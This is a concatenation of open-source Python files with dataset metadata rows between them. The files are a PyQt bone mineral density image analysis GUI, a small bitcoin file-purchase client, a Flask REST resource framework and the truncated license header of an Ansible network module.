leftFrameLayout.addWidget(self.viewMain)
self.viewMain.setMinimumSize(200,200)
self.vb = MultiRoiViewBox(lockAspect=True,enableMenu=True)
self.viewMain.addItem(self.vb)
self.vb.disableAutoRange()
# Right frame
self.sidePanel = SidePanel(self)
# UI window (containing left and right frames)
UIwindow = QtGui.QWidget(self)
UIwindowLayout = QtGui.QHBoxLayout()
UIwindowSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
UIwindowLayout.addWidget(UIwindowSplitter)
UIwindow.setLayout(UIwindowLayout)
self.setCentralWidget(UIwindow)
UIwindowSplitter.addWidget(leftFrame)
UIwindowSplitter.addWidget(self.sidePanel)
# Application window
self.setWindowTitle('BMDanalyse')
self.setWindowIcon(self.icons['BMDanalyseIcon'])
self.setMinimumSize(600,500)
self.resize(self.minimumSize())
# Window menus
self.createMenus()
self.createActions()
def createMenus(self):
# Menus
menubar = self.menuBar()
self.fileMenu = menubar.addMenu('&File')
self.imageMenu = menubar.addMenu('&Images')
self.roiMenu = menubar.addMenu('&ROIs')
self.submenu = self.roiMenu.addMenu(self.icons['roiAddIcon'],"Add ROI")
self.analyseMenu = menubar.addMenu('&Analysis')
self.aboutMenu = menubar.addMenu('A&bout')
def createActions(self):
# Actions for File menu
self.exitAct = QtGui.QAction("&Quit", self, shortcut="Ctrl+Q",statusTip="Exit the application")
self.exitAct.triggered[()].connect(self.close)
self.fileMenu.addAction(self.exitAct)
# Actions for Images menu
self.loadImageAct = QtGui.QAction(self.icons['imageAddIcon'], "&Load image(s)", self, shortcut="Ctrl+L")
self.removeImageAct = QtGui.QAction(self.icons['imageRemIcon'], "&Remove current image", self, shortcut="Ctrl+X")
imageMenuActions = [self.loadImageAct,self.removeImageAct]
imageMenuActFuncs = [self.loadImages,self.removeImage]
for i in xrange(len(imageMenuActions)):
action = imageMenuActions[i]
function = imageMenuActFuncs[i]
action.triggered[()].connect(function)
self.imageMenu.addAction(self.loadImageAct)
self.imageMenu.addAction(self.removeImageAct)
# Actions for ROI menu
self.addROIRectAct = QtGui.QAction("Rectangular",self.submenu)
self.addROIPolyAct = QtGui.QAction("Polygon",self.submenu)
self.addROIRectAct.triggered[()].connect(self.vb.addROI)
self.addROIPolyAct.triggered[()].connect(self.vb.addPolyRoiRequest)
self.submenu.addAction(self.addROIRectAct)
self.submenu.addAction(self.addROIPolyAct)
self.addROIRectAct.setIcon(self.icons['roiRectIcon'])
self.addROIPolyAct.setIcon(self.icons['roiPolyIcon'])
self.addROIRectAct.setShortcut("Ctrl+Shift+R")
self.addROIPolyAct.setShortcut("Ctrl+Shift+P")
self.loadRoiAct = QtGui.QAction(self.icons['roiLoadIcon'], "L&oad ROI", self, shortcut="Ctrl+O")
self.copyRoiAct = QtGui.QAction(self.icons['roiCopyIcon'], "&Copy ROI", self, shortcut="Ctrl+C")
self.saveRoiAct = QtGui.QAction(self.icons['roiSaveIcon'], "&Save ROI", self, shortcut="Ctrl+S")
self.remRoiAct = QtGui.QAction(self.icons['roiRemIcon'] , "&Remove ROI", self, shortcut="Ctrl+D")
roiMenuActions = [self.loadRoiAct,self.copyRoiAct,self.saveRoiAct,self.remRoiAct]
roiMenuActFuncs = [self.vb.loadROI,self.vb.copyROI,self.vb.saveROI,self.vb.removeROI]
for i in xrange(len(roiMenuActions)):
action = roiMenuActions[i]
function = roiMenuActFuncs[i]
action.triggered[()].connect(function)
self.roiMenu.addAction(action)
# Actions for Analyse menu
self.roiAnalysisAct = QtGui.QAction("&ROI analysis", self.viewMain, shortcut="Ctrl+R",triggered=self.getBMD)
self.imgAnalysisAct = QtGui.QAction("&Image analysis", self.viewMain, shortcut="Ctrl+I",triggered=self.imageAnalysis)
self.analyseMenu.addAction(self.roiAnalysisAct)
self.analyseMenu.addAction(self.imgAnalysisAct)
# Actions for
self.aboutAct = QtGui.QAction("&About", self.viewMain, shortcut='F1', triggered=self.onAbout)
self.aboutMenu.addAction(self.aboutAct)
def setupSignals(self):
""" Setup signals """
self.sidePanel.imageFileList.itemSelectionChanged.connect(self.getImageToDisplay)
self.sidePanel.buttImageAdd.clicked.connect(self.loadImages)
self.sidePanel.buttImageRem.clicked.connect(self.removeImage)
self.sidePanel.buttImageUp.clicked.connect(self.sidePanel.moveImageUp)
self.sidePanel.buttImageDown.clicked.connect(self.sidePanel.moveImageDown)
self.sidePanel.roiMenu.button1.clicked[()].connect(self.vb.addROI)
self.sidePanel.roiMenu.button2.clicked[()].connect(self.vb.addPolyRoiRequest)
self.sidePanel.buttRoiCopy.clicked[()].connect(self.vb.copyROI)
self.sidePanel.buttRoiRem.clicked.connect(self.vb.removeROI)
self.sidePanel.buttRoiLoad.clicked.connect(self.vb.loadROI)
self.sidePanel.buttRoiSave.clicked.connect(self.vb.saveROI)
self.sidePanel.buttRoiAnalysis.clicked.connect(self.getBMD)
self.sidePanel.buttImgAnalysis.clicked.connect(self.imageAnalysis)
def onAbout(self):
""" About BMDanalyse message"""
author ='Michael Hogg'
date ='2016'
version = self.__version__
QtGui.QMessageBox.about(self, 'About BMDanalyse',
"""
<b>BMDanalyse</b>
<p>A simple program for the analysis of a time series of Bone Mineral Density (BMD) images.</p>
<p>Used to evaluate the bone gain / loss in a number of regions of interest (ROIs) over time,
typically due to bone remodelling as a result of stress shielding around an orthopaedic implant.</p>
<p><table border="0" width="150">
<tr>
<td>Author:</td>
<td>%s</td>
</tr>
<tr>
<td>Version:</td>
<td>%s</td>
</tr>
<tr>
<td>Date:</td>
<td>%s</td>
</tr>
</table></p>
""" % (author,version,date))
def loadImages(self):
""" Load an image to be analysed """
newImages = {}
fileNames = QtGui.QFileDialog.getOpenFileNames(self, self.tr("Load images"),QtCore.QDir.currentPath())
# Fix for PySide. PySide doesn't support QStringList types. PyQt4 getOpenFileNames returns a QStringList, whereas PySide
# returns a type (the first entry being the list of filenames).
if isinstance(fileNames,types.TupleType): fileNames = fileNames[0]
if hasattr(QtCore,'QStringList') and isinstance(fileNames, QtCore.QStringList): fileNames = [str(i) for i in fileNames]
if len(fileNames)>0:
for fileName in fileNames:
if fileName!='':
img = Image.open(str(fileName))
imgarr = np.array(img.convert('L')) # Convert to 8-bit
imgarr = imgarr.swapaxes(0,1)
imgarr = imgarr[:,::-1]
newImages[fileName] = imgarr
# Add filenames to list widget. Only add new filenames. If filename exists aready, then
# it will not be added, but data will be updated
for fileName in sorted(newImages.keys()):
if not self.imageFiles.has_key(fileName):
self.sidePanel.addImageToList(fileName)
self.imageFiles[fileName] = newImages[fileName]
# Show image in Main window
self.vb.enableAutoRange()
if self.sidePanel.imageFileList.currentRow()==-1:
self.sidePanel.imageFileList.setCurrentRow(0)
self.showImage(str(self.sidePanel.imageFileList.currentItem().text()))
self.vb.disableAutoRange()
def removeImage(self):
""" Remove image from sidePanel imageFileList """
# Return if there is no image to remove
if self.vb.img is None: return
# Get current image in sidePanel imageFileList and remove from list
currentRow = self.sidePanel.imageFileList.currentRow()
image = self.sidePanel.imageFileList.takeItem(currentRow)
imageName = str(image.text())
# Delete key and value from dictionary
if imageName!='': del self.imageFiles[imageName]
# Get image item in imageFileList to replace deleted image
if self.sidePanel.imageFileList.count()==0:
self.vb.enableAutoRange()
self.vb.removeItem(self.vb.img)
self.vb.showImage(None)
self.vb.disableAutoRange()
else:
currentRow = self.sidePanel.imageFileList.currentRow()
imageName = str(self.sidePanel.imageFileList.item(currentRow).text())
self.showImage(imageName)
def showImage(self,imageFilename):
""" Shows image in main view """
self.arr = self.imageFiles[imageFilename]
self.vb.showImage(self.arr)
def getImageToDisplay(self):
""" Get current item in file list and display in main view"""
try: imageFilename = str(self.sidePanel.imageFileList.currentItem().text())
except: pass
else: self.showImage(imageFilename)
def getBMD(self):
""" Get change in BMD over time (e.g. for each image) for all ROIs.
Revised function that converts the list of images into a 3D array
and then uses the relative position of the ROIs to the current
image, self.vb.img, to get the average BMD value e.g. it doesn't use
setImage to change the image in the view. This requires that all
images are the same size and in the same position.
"""
# Return if there is no image or rois in view
if self.vb.img is None or len(self.vb.rois)==0: return
# Collect all images into a 3D array
imageFilenames = self.sidePanel.getListOfImages()
images = [self.imageFiles[str(name.text())] for name in imageFilenames]
imageData = np.dstack(images) # Doesn't work correctly if images are not all the same shape
numImages = len(images)
# Get BMD across image stack for each ROI
numROIs = len(self.vb.rois)
BMD = np.zeros((numImages,numROIs),dtype=float)
self.roiNames = []
for i in xrange(numROIs):
roi = self.vb.rois[i]
self.roiNames.append(roi.name)
arrRegion = roi.getArrayRegion(imageData,self.vb.img, axes=(0,1))
avgROIvalue = arrRegion.mean(axis=0).mean(axis=0)
BMD[:,i] = avgROIvalue
# Calculate the BMD change (percentage of original)
tol = 1.0e-06
for i in xrange(numROIs):
if abs(BMD[0,i])<tol:
BMD[:,i] = 100.
else:
BMD[:,i] = BMD[:,i] / BMD[0,i] * 100.
self.BMDchange = BMD-100.
if self.timeData is None or self.timeData.size!=numImages:
self.timeData = np.arange(numImages,dtype=float)
# Plot results
self.showResults()
def imageAnalysis(self):
# Generate images of BMD change
if self.vb.img is None: return
self.showImageWin()
def sliderValueChanged(self,value):
self.imageWin.sliderLabel.setText('BMD change: >= %d %s' % (value,'%'))
self.setLookupTable(value)
self.imageWin.vb.img2.setLookupTable(self.lut)
self.imageWin.vb.img2.setLevels([0,255])
def setLookupTable(self,val):
lut = []
for i in range(256):
if i > 127+val:
lut.append(matplotlib.cm.jet(255))
elif i < 127-val:
lut.append(matplotlib.cm.jet(0))
else:
lut.append((0.0,0.0,0.0,0.0))
lut = np.array(lut)*255
self.lut = np.array(lut,dtype=np.ubyte)
def createImageWin(self):
self.buttMinimumSize = QtCore.QSize(70,36)
self.iconSize = QtCore.QSize(24,24)
if self.imageWin==None:
self.imageWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.imageWin.setWindowTitle('BMDanalyse')
self.imageWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.imageWin.setMinimumSize(250,500)
self.imageWin.resize(self.imageWin.minimumSize())
# Create viewBox
self.imageWin.glw = GraphicsLayoutWidget() # A GraphicsLayout within a GraphicsView
self.imageWin.vb = ImageAnalysisViewBox(lockAspect=True,enableMenu=True)
self.imageWin.vb.disableAutoRange()
self.imageWin.glw.addItem(self.imageWin.vb)
arr = self.imageFiles.values()[0]
self.imageWin.vb.img1 = ImageItem(arr,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img1)
self.imageWin.vb.img2 = ImageItem(None,autoRange=False,autoLevels=False)
self.imageWin.vb.addItem(self.imageWin.vb.img2)
self.imageWin.vb.autoRange()
lut = [ [ int(255*val) for val in matplotlib.cm.gray(i)[:3] ] for i in xrange(256) ]
lut = np.array(lut,dtype=np.ubyte)
self.imageWin.vb.img1.setLookupTable(lut)
# Label to show index of current image label
self.imageCurrCont = QtGui.QFrame()
self.imageCurrCont.setLineWidth(2)
self.imageCurrCont.setFrameStyle(QtGui.QFrame.Panel | QtGui.QFrame.Raised)
self.imageCurrCont.setMinimumWidth(70)
self.imageWin.currLabel = QtGui.QLabel("")
self.imageWin.currLabel.setAlignment(QtCore.Qt.AlignHCenter)
imageCurrContLayout = QtGui.QHBoxLayout()
imageCurrContLayout.addWidget(self.imageWin.currLabel)
self.imageCurrCont.setLayout(imageCurrContLayout)
# Create buttons to select images
self.imageWin.buttCont = QtGui.QWidget()
self.imageWin.buttPrev = QtGui.QPushButton(self.icons['imagePrevIcon'],"")
self.imageWin.buttNext = QtGui.QPushButton(self.icons['imageNextIcon'],"")
self.buttLayout = QtGui.QHBoxLayout()
self.buttLayout.addStretch(1)
self.buttLayout.addWidget(self.imageWin.buttPrev)
self.buttLayout.addWidget(self.imageCurrCont)
self.buttLayout.addWidget(self.imageWin.buttNext)
self.buttLayout.addStretch(1)
self.imageWin.buttCont.setLayout(self.buttLayout)
self.imageWin.buttPrev.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttNext.setMinimumSize(self.buttMinimumSize)
self.imageWin.buttPrev.setIconSize(self.iconSize)
self.imageWin.buttNext.setIconSize(self.iconSize)
self.buttLayout.setContentsMargins(0,5,0,5)
self.imageWin.buttPrev.clicked.connect(self.prevImage)
self.imageWin.buttNext.clicked.connect(self.nextImage)
# Create slider
self.imageWin.sliderCon = QtGui.QWidget()
self.imageWin.slider = QtGui.QSlider(self)
self.imageWin.slider.setOrientation(QtCore.Qt.Horizontal)
self.imageWin.slider.setMinimum(1)
self.imageWin.slider.setMaximum(100)
self.imageWin.slider.setMinimumWidth(100)
self.imageWin.slider.valueChanged.connect(self.sliderValueChanged)
self.imageWin.sliderLabel = QtGui.QLabel('1')
self.imageWin.sliderLabel.setMinimumWidth(120)
self.sliderLayout = QtGui.QHBoxLayout()
self.sliderLayout.addStretch(1)
self.sliderLayout.addWidget(self.imageWin.sliderLabel)
self.sliderLayout.addWidget(self.imageWin.slider)
self.sliderLayout.addStretch(1)
self.imageWin.sliderCon.setLayout(self.sliderLayout)
self.sliderLayout.setContentsMargins(0,0,0,5)
# Format image window
self.imageWinLayout = QtGui.QVBoxLayout()
self.imageWinLayout.addWidget(self.imageWin.glw)
self.imageWinLayout.addWidget(self.imageWin.buttCont)
self.imageWinLayout.addWidget(self.imageWin.sliderCon)
self.imageWin.setLayout(self.imageWinLayout)
self.imageWin.imagesRGB = None
# Show
self.imageWin.show()
self.imageWin.slider.setValue(10)
self.sliderValueChanged(10)
self.imageWinIndex = 0
def prevImage(self):
minIndex = 0
currIndex = self.imageWinIndex
prevIndex = currIndex - 1
self.imageWinIndex = max(prevIndex,minIndex)
self.updateImageWin()
def nextImage(self):
numImages = len(self.imageFiles)
maxIndex = numImages - 1
currIndex = self.imageWinIndex
nextIndex = currIndex + 1
self.imageWinIndex = min(nextIndex,maxIndex)
self.updateImageWin()
def updateImageWin(self):
imageFilenames = self.sidePanel.getListOfImages()
imageName = imageFilenames[self.imageWinIndex]
self.imageWin.vb.img1.setImage(self.imageFiles[str(imageName.text())],autoLevels=False)
self.imageWin.vb.img2.setImage(self.imageWin.imagesRGB[self.imageWinIndex],autoLevels=False)
self.imageWin.currLabel.setText("%i / %i" % (self.imageWinIndex+1,len(imageFilenames)))
def showImageWin(self):
self.createImageWin()
self.imagesBMDpercentChange()
self.updateImageWin()
def imagesBMDpercentChange(self):
# Get image arrays and convert to an array of floats
imageFilenames = self.sidePanel.getListOfImages()
images = [ self.imageFiles[str(name.text())] for name in imageFilenames ]
imagesConv = []
for img in images:
image = img.copy()
image[np.where(image==0)] = 1
image = image.astype(np.float)
imagesConv.append(image)
# Calculate percentage change and set with limits -100% to +100%
imagesPercCh = []
imageInitial = imagesConv[0]
for image in imagesConv:
imagePercCh = (image-imageInitial)/imageInitial*100.
imagePercCh[np.where(imagePercCh> 100.)] = 100.
imagePercCh[np.where(imagePercCh<-100.)] = -100.
imagesPercCh.append(imagePercCh)
numImages = len(imagesPercCh)
self.imageWin.imagesRGB = []
for i in xrange(numImages):
image = imagesPercCh[i]
sx,sy = image.shape
imageRGB = image*(255/200.)+(255/2.)
self.imageWin.imagesRGB.append(imageRGB)
def BMDtoCSVfile(self):
""" Write BMD change to csv file """
fileName = QtGui.QFileDialog.getSaveFileName(None,self.tr("Export to CSV"),QtCore.QDir.currentPath(),self.tr("CSV (*.csv)"))
# Fix for PyQt/PySide compatibility. PyQt returns a QString, whereas PySide returns a tuple (first entry is filename as string)
if isinstance(fileName,types.TupleType): fileName = fileName[0]
if hasattr(QtCore,'QString') and isinstance(fileName, QtCore.QString): fileName = str(fileName)
if not fileName=='':
textFile = open(fileName,'w')
numFrames, numROIs = self.BMDchange.shape
roiNames = self.roiNames
header = "%10s," % 'Time'
header += ((numROIs-1)*'%10s,'+'%10s\n') % tuple(roiNames)
textFile.write(header)
for i in xrange(numFrames):
textFile.write('%10.1f,' % self.timeData[i])
for j in xrange(numROIs):
if j<numROIs-1: fmt = '%10.3f,'
else: fmt = '%10.3f\n'
textFile.write(fmt % self.BMDchange[i,j])
textFile.close()
def showResults(self,):
""" Plots BMD change using matplotlib """
# Create plot window
if self.plotWin==None:
self.plotWin = QtGui.QDialog(self, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint | \
QtCore.Qt.WindowMinimizeButtonHint | QtCore.Qt.WindowMaximizeButtonHint)
self.plotWin.setWindowTitle('BMDanalyse')
self.plotWin.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.setMinimumSize(600,500)
self.plotWin.resize(self.minimumSize())
# Create Matplotlib widget
self.mplw = MatplotlibWidget(size=(5,6))
self.fig = self.mplw.getFigure()
self.editDataButton = QtGui.QPushButton('Edit plot')
self.exportCSVButton = QtGui.QPushButton('Export data')
self.mplw.toolbar.addWidget(self.editDataButton)
self.mplw.toolbar.addWidget(self.exportCSVButton)
self.editDataButton.clicked.connect(self.showEditBox)
self.exportCSVButton.clicked.connect(self.BMDtoCSVfile)
# Format plot window
self.plotWinLayout = QtGui.QVBoxLayout()
self.plotWinLayout.addWidget(self.mplw)
self.plotWin.setLayout(self.plotWinLayout)
self.createFigure()
self.plotWin.show()
self.mplw.draw()
def createFigure(self):
""" Creates plot of results """
self.ax1 = self.fig.add_subplot(111)
self.ax1.clear()
self.fig.subplots_adjust(bottom=0.15,top=0.85,left=0.15,right=0.925)
numFrames, numROIs = self.BMDchange.shape
t = self.timeData
# Plot data
for i in xrange(numROIs):
roiname = self.roiNames[i]
self.ax1.plot(t,self.BMDchange[:,i],'-o',label=roiname,linewidth=2.0)
kwargs = dict(y=1.05) # Or kwargs = {'y':1.05}
self.ax1.set_title('Change in Bone Mineral Density over time',fontsize=14,fontweight='roman',**kwargs)
self.ax1.set_xlabel('Time',fontsize=10)
self.ax1.set_ylabel('Change in BMD (%)',fontsize=10)
self.ax1.legend(loc=0)
matplotlib.pyplot.setp(self.ax1.get_xmajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_ymajorticklabels(), fontsize=10)
matplotlib.pyplot.setp(self.ax1.get_legend().get_texts(),fontsize=10)
self.ax1.grid()
def fillEditBox(self):
rows,cols = self.BMDchange.shape
for i in xrange(rows):
itmValue = '%.2f' % self.timeData[i]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,0,itm)
for j in xrange(cols):
itmValue = '%.2f' % self.BMDchange[i,j]
itm = QtGui.QTableWidgetItem(itmValue)
self.tableResults.setItem(i,j+1,itm)
def showEditBox(self):
self.plotWin.editBox = QtGui.QDialog(self.plotWin, QtCore.Qt.WindowSystemMenuHint | QtCore.Qt.WindowTitleHint)
self.plotWin.editBox.setWindowIcon(self.icons['BMDanalyseIcon'])
self.plotWin.editBox.setWindowTitle('BMDanalyse')
self.plotWin.editBox.setModal(True)
# Add table
layout = QtGui.QVBoxLayout()
layout.setContentsMargins(10,10,10,10)
layout.setSpacing(20)
rows,cols = self.BMDchange.shape
self.tableResults = TableWidget(rows,cols+1,self.plotWin.editBox)
self.tableResults.verticalHeader().setVisible(True)
# Set headers
self.tableResults.setHorizontalHeaderItem(0,QtGui.QTableWidgetItem('Time'))
for i in xrange(cols):
header = QtGui.QTableWidgetItem(self.roiNames[i])
self.tableResults.setHorizontalHeaderItem(i+1,header)
# Add values to table
self.fillEditBox()
# Set layout
layout.addWidget(self.tableResults)
self.buttonsFrame = QtGui.QFrame()
self.buttonsLayout = QtGui.QHBoxLayout()
self.buttonReset = QtGui.QPushButton('Reset')
self.buttonSave = QtGui.QPushButton('Save')
self.buttonClose = QtGui.QPushButton('Cancel')
self.buttonReset.setFixedWidth(50)
self.buttonSave.setFixedWidth(50)
self.buttonClose.setFixedWidth(50)
self.buttonClose.clicked.connect(self.plotWin.editBox.close)
self.buttonSave.clicked.connect(self.updateTableValues)
self.buttonReset.clicked.connect(self.fillEditBox)
self.buttonsLayout.addStretch(1)
self.buttonsLayout.addWidget(self.buttonReset)
self.buttonsLayout.addWidget(self.buttonSave)
self.buttonsLayout.addWidget(self.buttonClose)
self.buttonsLayout.setContentsMargins(0,0,0,0)
self.buttonsFrame.setLayout(self.buttonsLayout)
layout.addWidget(self.buttonsFrame)
self.plotWin.editBox.setLayout(layout)
self.plotWin.editBox.setMaximumSize(layout.sizeHint())
self.plotWin.editBox.show()
def updateTableValues(self):
# Create temporary arrays
timeData = self.timeData.copy()
BMDchange = self.BMDchange.copy()
# Put the values from the tables into the temporary arrays
rows = self.tableResults.rowCount()
cols = self.tableResults.columnCount()
for r in xrange(rows):
for c in xrange(cols):
item = self.tableResults.item(r,c)
itemValue = float(item.text())
if c==0:
timeData[r] = itemValue
else:
BMDchange[r,c-1] = itemValue
# Check that time values are in increasing order. If so, then update arrays
if any(np.diff(timeData)<=0):
self.errorMessage = QtGui.QMessageBox()
self.errorMessage.setWindowIcon(self.icons['BMDanalyseIcon'])
self.errorMessage.setWindowTitle('BMDanalyse')
self.errorMessage.setText('Input error: Time values should be in order of increasing value')
self.errorMessage.setIcon(QtGui.QMessageBox.Warning)
self.errorMessage.open()
else:
self.timeData = timeData
self.BMDchange = BMDchange
self.createFigure()
self.mplw.draw()
self.plotWin.editBox.close()
|
mit
| 8,683,989,055,049,540,000
| 48.940397
| 143
| 0.621192
| false
| 3.744166
| false
| false
| false
|
fredzannarbor/pagekicker-community
|
scripts_python_3/bitcoin/fileclient/fileclient.py
|
1
|
2020
|
#!/usr/bin/env python3
import json
from two1.wallet import Wallet
from two1.bitrequests import BitTransferRequests
# set up bitrequest client for BitTransfer requests
wallet = Wallet()
requests = BitTransferRequests(wallet)
# server address
server_url = 'http://localhost:5000/'
def buy_file():
# get the file listing from the server
response = requests.get(url=server_url+'files')
file_list = json.loads(response.text)
# print the file list to the console
for file in range(len(file_list)):
print(("{}. {}\t{}".format(file+1, file_list[str(file+1)][0], file_list[str(file+1)][1])))
try:
# prompt the user to input the index number of the file to be purchased
sel = eval(input("Please enter the index of the file that you would like to purchase:"))
# check if the input index is valid key in file_list dict
if sel in file_list:
print(('You selected {} in our database'.format(file_list[sel][0])))
# create a 402 request with the server payout address
sel_url = server_url+'buy?selection={0}&payout_address={1}'
answer = requests.get(url=sel_url.format(int(sel), wallet.get_payout_address()), stream=True)
if answer.status_code != 200:
print("Could not make an offchain payment. Please check that you have sufficient buffer.")
else:
# open a file with the same name as the file being purchased and stream the data into it.
filename = file_list[str(sel)][0]
with open(filename, 'wb') as fd:
for chunk in answer.iter_content(4096):
fd.write(chunk)
fd.close()
print('Congratulations, you just purchased a file for bitcoin!')
else:
print("That is an invalid selection.")
except ValueError:
print("That is an invalid input. Only numerical inputs are accepted.")
if __name__ == '__main__':
buy_file()
|
apache-2.0
| -9,155,594,795,914,871,000
| 35.727273
| 106
| 0.619307
| false
| 4.04
| false
| false
| false
|
jfillmore/hoops
|
hoops/base.py
|
1
|
9650
|
import copy
import json
import re
import logging
from flask import g, request
from flask.ext.restful import abort
from formencode import Invalid, Schema
from formencode.validators import Validator
from hoops.restful import Resource
from hoops.exc import APIValidationException
from hoops.status import library as status_library
request_logger = logging.getLogger('api.request')
class APIOperation(object):
'''
Used to map API parameter names to database fields. e.g.
field_map = {
(param_name, field_name) = lambda val: val,
...
}
'''
field_map = {}
def __call__(self, *args, **kwargs):
# logging parameters
self.url_params = self.validate_url(**kwargs)
self.params = self.validate_input()
remote_addr = request.remote_addr or 'localhost'
request_method = request.environ.get('REQUEST_METHOD')
path_info = request.environ.get('PATH_INFO')
request_logger.debug(
'Request: %s %s %s %s',
remote_addr, request_method, path_info, unicode(self.params)
)
if hasattr(self, 'setup'):
self.setup(*args, **kwargs)
return self.process_request(*args, **kwargs)
def __init__(self, resource=None, method='get'):
self.resource = resource
@property
def combined_params(self):
params = copy.deepcopy(getattr(self, 'params', {}))
url_params = getattr(self, 'url_params', {})
params.update(url_params)
return params
def _map_fields(self, params):
for (param_name, field_name) in self.field_map:
# ignore params in our map not supplied in the API call
if param_name not in params:
continue
# we'll also change the value accordingly
func = self.field_name[(param_name, field_name)]
# add the new value back in, removing the old
params[field_name] = func(params[param_name])
del params[param_name]
return params
def _combine_schema(self, attr_name='schema'):
resource_schema = getattr(self.resource, attr_name, None)
operation_schema = getattr(self, attr_name, None)
# Merge combined schemas, preferring the operation_schema settings and fields
if resource_schema and operation_schema:
schema = copy.deepcopy(operation_schema)
for field in resource_schema.fields:
if not field in schema.fields:
schema.add_field(field, resource_schema.fields[field])
else:
schema = resource_schema or operation_schema
return schema or Schema()
def validate_url(self, *args, **kwargs):
schema = self._combine_schema('url_schema')
if not schema: # pragma: no cover
return {}
try:
return schema.to_python(kwargs)
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
def validate_input(self):
schema = self._combine_schema('schema')
try:
params = schema.to_python(self.resource.get_parameters())
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
return self._map_fields(params)
def process_request(self, *args, **kwargs):
pass
class APIModelOperation(APIOperation):
@property
def model(self):
return self.resource.model
def get_base_query(self, **kwargs):
'''Obtains the base query for a model-based operation.'''
all_params = kwargs
all_params.update(self.combined_params)
return self.resource.get_base_query(**all_params)
def fetch(self, **kwargs):
item_id = self.combined_params.get(self.resource.object_id_param, None)
id_column = getattr(self, 'id_column', 'id')
column = getattr(self.model, id_column)
item = self.get_base_query(**kwargs).filter(column == item_id).first()
if item is None:
raise status_library.exception(
'API_DATABASE_RESOURCE_NOT_FOUND',
resource=self.resource.model.__tablename__
)
return item
class UnimplementedOperation(APIOperation):
def __call__(self, *args, **kwargs):
raise status_library.API_CODE_NOT_IMPLEMENTED
class APIResource(Resource):
route = None
model = None
read_only = True
object_id_param = None
endpoint = None
create = UnimplementedOperation()
retrieve = UnimplementedOperation()
update = UnimplementedOperation()
remove = UnimplementedOperation()
list = UnimplementedOperation()
#def __repr__(self):
# methods = ['create', 'retrieve', 'update', 'remove', 'list']
# noop = UnimplementedOperation()
# return "<%s [%s: %s]>" % (
# self.__cls__.__name__,
# self.route,
# ', '.join([
# method for method in methods
# if getattr(self, method) is not noop
# ])
# )
@classmethod
def get_parameters(cls):
def purge_oauth_keys(params):
return {k: params[k] for k in filter(lambda item: not re.match(r'^oauth_', item), params)}
from flask import request
if request.method == 'GET':
return purge_oauth_keys(request.args)
elif request.json:
return purge_oauth_keys(request.json)
elif request.form:
return purge_oauth_keys(request.form)
else:
# TODO: is this case even needed?
return purge_oauth_keys(
json.JSONDecoder().decode(request.stream.read())
)
@classmethod
def method(self, method, endpoint=None):
'''
Decorator to bind a callable as the handler for a method.
It sets the resource property on the callable to be the parent resource.
'''
def wrapper(cls, *args, **kwargs):
cls.resource = self
setattr(self, method, cls(resource=self))
return cls
return wrapper
def get(self, **kwargs):
if self.object_id_param in kwargs:
return self.retrieve(**kwargs)
return self.list(**kwargs)
def post(self, **kwargs):
if self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't POST with arguments in URL
if self.read_only:
abort(405)
return self.create(**kwargs)
def put(self, **kwargs):
if not self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't PUT without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.update(**kwargs)
def delete(self, **kwargs):
if not self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't DELETE without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.remove(**kwargs)
@classmethod
def get_base_query(self, **kwargs):
model = self.model
query = model.query
return query
class base_parameter(object):
schema_property = 'schema'
def __init__(self, field, validator, description):
self.field = field
if isinstance(validator, Validator):
self.validator = validator
else:
self.validator = validator()
self.validator.__doc__ = description
def __call__(self, klass):
if not hasattr(klass, self.schema_property):
schema = Schema()
else:
schema = copy.deepcopy(getattr(klass, self.schema_property))
schema.add_field(self.field, self.validator)
setattr(klass, self.schema_property, schema)
return klass
class parameter(base_parameter):
'''Binds a formencode validator to the schema in either a APIResource or APIOperation.
If the Schema is not yet present, one is created.
The ``required`` and ``default`` named parameters can be used as shortcuts to modify the
``validator`` as if_missing=default and not_empty=required.
Example:
@parameter("id", validator=formencode.validators.Int(), description="Unique ID of object", required=True, default=None)
'''
def __init__(self, field, validator, description, required=None, default=None):
super(parameter, self).__init__(field, validator, description)
if required is not None:
self.validator.not_empty = required
if default is not None:
self.validator.if_missing = default
class url_parameter(base_parameter):
'''Binds a formencode validator to the url_schema in either a APIResource or APIOperation.
If the URL Schema is not yet present, one is created.
All validators added to the schema this way have not_empty=True (as they are mandatory).
Example:
@url_parameter("id", validator=formencode.validators.Int(), description="Unique ID of object")
'''
schema_property = 'url_schema'
|
mit
| 7,188,259,168,814,752,000
| 33.09894
| 123
| 0.607254
| false
| 4.168467
| false
| false
| false
|
tsdmgz/ansible
|
lib/ansible/modules/network/cnos/cnos_conditional_command.py
|
1
|
7325
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
